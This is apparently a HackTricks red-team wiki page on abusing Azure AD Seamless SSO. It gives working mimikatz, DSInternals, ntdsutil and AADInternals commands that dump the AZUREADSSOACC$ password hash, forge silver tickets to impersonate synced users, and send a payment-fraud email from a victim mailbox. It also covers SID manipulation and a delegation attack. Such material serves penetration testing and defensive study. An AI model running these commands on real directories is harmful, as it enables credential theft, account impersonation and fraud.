Links

Az - Seamless SSO

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks:

Basic Information

From the docs: Azure Active Directory Seamless Single Sign-On (Azure AD Seamless SSO) automatically signs users in when they are on their corporate devices connected to your corporate network. When enabled, users don't need to type in their passwords to sign in to Azure AD, and usually, even type in their usernames. This feature provides your users easy access to your cloud-based applications without needing any additional on-premises components.
Basically Azure AD Seamless SSO signs users in when they are on a on-prem domain joined PC.
Desktop SSO is using Kerberos for authentication. When configured, Azure AD Connect creates a computer account called AZUREADSSOACC$ in on-prem AD. The password of the AZUREADSSOACC$ account is sent as plain-text to Azure AD during the configuration.
The Kerberos tickets are encrypted using the NTHash (MD4) of the password and Azure AD is using the sent password to decrypt the tickets.
Azure AD exposes an endpoint (https://autologon.microsoftazuread-sso.com) that accepts Kerberos tickets. Domain-joined machine's browser forwards the tickets to this endpoint for SSO.

On-prem -> cloud

The password of the user AZUREADSSOACC$ never changes. Therefore, a domain admin could compromise the hash of this account, and then use it to create silver tickets to connect to Azure with any on-prem user synced:
# Dump hash using mimikatz
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\azureadssoacc$ /domain:domain.local /dc:dc.domain.local"'
mimikatz.exe "lsadump::dcsync /user:AZUREADSSOACC$" exit
# Dump hash using https://github.com/MichaelGrafnetter/DSInternals
Get-ADReplAccount -SamAccountName 'AZUREADSSOACC$' -Domain contoso -Server lon-dc1.contoso.local
# Dump using ntdsutil and DSInternals
## Dump NTDS.dit
ntdsutil "ac i ntds" "ifm” "create full C:\temp" q q
## Extract password
Install-Module DSInternals
Import-Module DSInternals
$key = Get-BootKey -SystemHivePath 'C:\temp\registry\SYSTEM'
(Get-ADDBAccount -SamAccountName 'AZUREADSSOACC$' -DBPath 'C:\temp\Active Directory\ntds.dit' -BootKey $key).NTHash | Format-Hexos
With the hash you can now generate silver tickets:
# Get users and SIDs
Get-AzureADUser | Select UserPrincipalName,OnPremisesSecurityIdentifier
# Create a silver ticket to connect to Azure with mimikatz
Invoke-Mimikatz -Command '"kerberos::golden /user:onpremadmin /sid:S-1-5-21-123456789-1234567890-123456789 /id:1105 /domain:domain.local /rc4:<azureadssoacc hash> /target:aadg.windows.net.nsatc.net /service:HTTP /ptt"'
mimikatz.exe "kerberos::golden /user:elrond /sid:S-1-5-21-2121516926-2695913149-3163778339 /id:1234 /domain:contoso.local /rc4:12349e088b2c13d93833d0ce947676dd /target:aadg.windows.net.nsatc.net /service:HTTP /ptt" exit
# Create silver ticket with AADInternal to access Exchange Online
$kerberos=New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-3279074086-2022502410-1104" -Hash "097AB3CBED7B9DD6FE6C992024BC38F4"
$at=Get-AADIntAccessTokenForEXO -KerberosTicket $kerberos -Domain company.com
## Send email
Send-AADIntOutlookMessage -AccessToken $at -Recipient "[email protected]" -Subject "Urgent payment" -Message "<h1>Urgent!</h1><br>The following bill should be paid asap."
To utilize the silver ticket, the following steps should be executed:
  1. 1.
    Initiate the Browser: Mozilla Firefox should be launched.
  2. 2.
    Configure the Browser:
  3. 3.
    Access the Web Application:
    • Visit a web application that is integrated with the organization's AAD domain. A common example is Office 365.
  4. 4.
    Authentication Process:
    • At the logon screen, the username should be entered, leaving the password field blank.
    • To proceed, press either TAB or ENTER.
This doesn't bypass MFA if enabled

Creating Kerberos tickets for cloud-only users

If the Active Directory administrators have access to Azure AD Connect, they can set SID for any cloud-user. This way Kerberos tickets can be created also for cloud-only users. The only requirement is that the SID is a proper SID.
Changing SID of cloud-only admin users is now blocked by Microsoft. For info check https://aadinternals.com/post/on-prem_admin/

On-prem -> Cloud via Resource Based Constrained Delegation

Anyone that can manage computer accounts (AZUREADSSOACC$) in the container or OU this account is in, it can configure a resource based constrained delegation over the account and access it.
python rbdel.py -u <workgroup>\\<user> -p <pass> <ip> azureadssosvc$

References

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
Other ways to support HackTricks: